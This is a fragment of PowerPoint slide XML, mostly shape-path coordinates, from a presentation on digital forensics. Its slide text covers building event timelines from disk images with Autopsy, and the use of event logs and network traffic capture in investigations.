                    <a:pt x="2996549" y="2709711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023975" y="2673737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050443" y="2637010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3075935" y="2599549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3100433" y="2561374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123917" y="2522502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3146370" y="2482952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3167771" y="2442743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188104" y="2401893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207348" y="2360422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3225487" y="2318347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242500" y="2275688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3258369" y="2232463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273076" y="2188690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286601" y="2144389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3298927" y="2099578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3310035" y="2054275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3319906" y="2008500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328521" y="1962270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3335862" y="1915605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3341910" y="1868523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3346646" y="1821043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3350052" y="1773183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3352110" y="1724962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3352800" y="1676400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3352110" y="1627837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3350052" y="1579616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3346646" y="1531756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3341910" y="1484276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3335862" y="1437194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328521" y="1390529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3319906" y="1344299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3310035" y="1298524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3298927" y="1253221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286601" y="1208410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273076" y="1164109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3258369" y="1120336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242500" y="1077111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3225487" y="1034452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207348" y="992377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188104" y="950906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3167771" y="910056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3146370" y="869847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123917" y="830297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3100433" y="791425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3075935" y="753250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050443" y="715789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023975" y="679062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2996549" y="643088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968185" y="607885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2938900" y="573471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908714" y="539865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2877645" y="507087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2845712" y="475154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812934" y="444085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779328" y="413899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744914" y="384614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709711" y="356250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673737" y="328824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2637010" y="302356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2599549" y="276864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2561374" y="252366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2522502" y="228882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2482952" y="206429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442743" y="185028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2401893" y="164695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360422" y="145451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2318347" y="127312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275688" y="110299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2232463" y="94430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2188690" y="79723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2144389" y="66198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099578" y="53872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054275" y="42764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2008500" y="32893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1962270" y="24278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1915605" y="16937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1868523" y="10889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821043" y="6153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773183" y="2747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1724962" y="689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676400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39924" y="4959096"/>
              <a:ext cx="1513331" cy="1513331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5241035" y="6509004"/>
            <a:ext cx="1275715" cy="1652270"/>
            <a:chOff x="5241035" y="6509004"/>
            <a:chExt cx="1275715" cy="1652270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5241035" y="6509004"/>
              <a:ext cx="779145" cy="1652270"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="779145" h="1652270">
                  <a:moveTo>
                    <a:pt x="778763" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="731410" y="1507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684795" y="5972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639001" y="13308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594110" y="23428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550204" y="36247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507366" y="51678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465678" y="69633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425222" y="90028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386079" y="112775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348334" y="137789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312067" y="164982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277361" y="194269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244298" y="225562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212961" y="258776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183431" y="293824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155792" y="330620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130124" y="369077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106510" y="409109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85033" y="450629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65775" y="493552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48818" y="537790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34244" y="583257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22135" y="629867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12574" y="677534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5643" y="726170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424" y="775690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="826008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424" y="876325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5643" y="925845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12574" y="974481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22135" y="1022148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34244" y="1068758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48818" y="1114225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65775" y="1158463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85033" y="1201386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106510" y="1242906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130124" y="1282938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155792" y="1321395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183431" y="1358191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212961" y="1393239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244298" y="1426453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277361" y="1457746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312067" y="1487033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348334" y="1514226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386079" y="1539240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425222" y="1561987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465678" y="1582382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507366" y="1600337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550204" y="1615768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594110" y="1628587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639001" y="1638707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684795" y="1646043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731410" y="1650508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778763" y="1652016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778763" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732772" y="1331175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687986" y="1324344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644610" y="1313220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602849" y="1298015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562906" y="1278944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524985" y="1256218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489291" y="1230051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456028" y="1200656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425400" y="1168246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397610" y="1133034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372864" y="1095234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351365" y="1055059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333317" y="1012721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318924" y="968434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308391" y="922410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301921" y="874864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299719" y="826008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301921" y="777151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308391" y="729605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318924" y="683581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333317" y="639294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351365" y="596956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372864" y="556781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397610" y="518981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425400" y="483769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456028" y="451359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489291" y="421964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524985" y="395797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562906" y="373071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602849" y="354000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644610" y="338795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687986" y="327671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732772" y="320840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778763" y="318516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778763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519927" y="6803136"/>
              <a:ext cx="996950" cy="1064260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="996950" h="1064259">
                  <a:moveTo>
                    <a:pt x="498348" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="452991" y="2173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408774" y="8569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365874" y="18998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324466" y="33275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284727" y="51209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246831" y="72615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210956" y="97304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177277" y="125089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145970" y="155781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117212" y="189193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91177" y="225137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68043" y="263426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47985" y="303871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31180" y="346285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17802" y="390480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8029" y="436269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036" y="483463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="531875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036" y="580288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8029" y="627482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17802" y="673271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31180" y="717466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47985" y="759880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68043" y="800325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91177" y="838614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117212" y="874558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145970" y="907970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177277" y="938662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210956" y="966447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246831" y="991136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284727" y="1012542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324466" y="1030476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365874" y="1044753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408774" y="1055182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452991" y="1061578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498348" y="1063751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543704" y="1061578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587921" y="1055182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630821" y="1044753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672229" y="1030476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711968" y="1012542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749864" y="991136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785739" y="966447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819418" y="938662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850725" y="907970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879483" y="874558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905518" y="838614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="928652" y="800325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948710" y="759880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965515" y="717466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978893" y="673271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988666" y="627482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994659" y="580288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996696" y="531875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994659" y="483463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988666" y="436269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978893" y="390480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965515" y="346285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948710" y="303871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="928652" y="263426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905518" y="225137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879483" y="189193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850725" y="155781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819418" y="125089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785739" y="97304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749864" y="72615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711968" y="51209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672229" y="33275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630821" y="18998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587921" y="8569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543704" y="2173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498348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02451" y="7210044"/>
              <a:ext cx="231648" cy="2499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60081" y="306451"/>
            <a:ext cx="173418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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Timelines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33344" y="2615183"/>
            <a:ext cx="10277856" cy="583539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85431" y="760476"/>
            <a:ext cx="2555748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28013" y="1933193"/>
            <a:ext cx="1295781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screenshot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below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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>shows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use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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Autopsy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generate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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>timeline</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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events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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from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disk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image: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42635" y="306451"/>
            <a:ext cx="556958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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Event</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="160">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Traffic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79591" y="4139184"/>
            <a:ext cx="5370576" cy="34792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619356" y="6514286"/>
            <a:ext cx="2872740" cy="103314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 indent="60960">
              <a:lnSpc>
                <a:spcPct val="100299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pP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record </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>collection </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>methods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are </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>used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to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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establish</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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provenance.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08758" y="6345428"/>
            <a:ext cx="4044950" cy="13677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065" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pP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Retrospective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network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analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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enables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recording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network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events </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>at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 packet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header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payload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level.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19955" y="760476"/>
            <a:ext cx="7848600" cy="36575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490340" y="1764894"/>
            <a:ext cx="9272270" cy="2038350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90"/>
              </a:spcBef>
            </a:pP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Event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logs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network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appliances</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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obtained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during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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>investigation.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="230504">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="190"/>
              </a:spcBef>
            </a:pP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Key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aspects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event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logs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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network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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>traffic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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>are: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200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="662305">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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helps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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>collect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data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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from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network</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="661670">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pP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logging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servers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form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event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logs.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00771" y="5213603"/>
            <a:ext cx="1647444" cy="1647444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5127" y="3909059"/>
            <a:ext cx="6093460" cy="3328670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6093459" h="3328670">
                <a:moveTo>
                  <a:pt x="0" y="554736"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2036" y="506878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8035" y="460149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17829" y="414716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31252" y="370745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48137" y="328404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68318" y="287858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91627" y="249275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117899" y="212821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146966" y="178662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178662" y="146966"/>
                </a:lnTo>
                <a:lnTo>
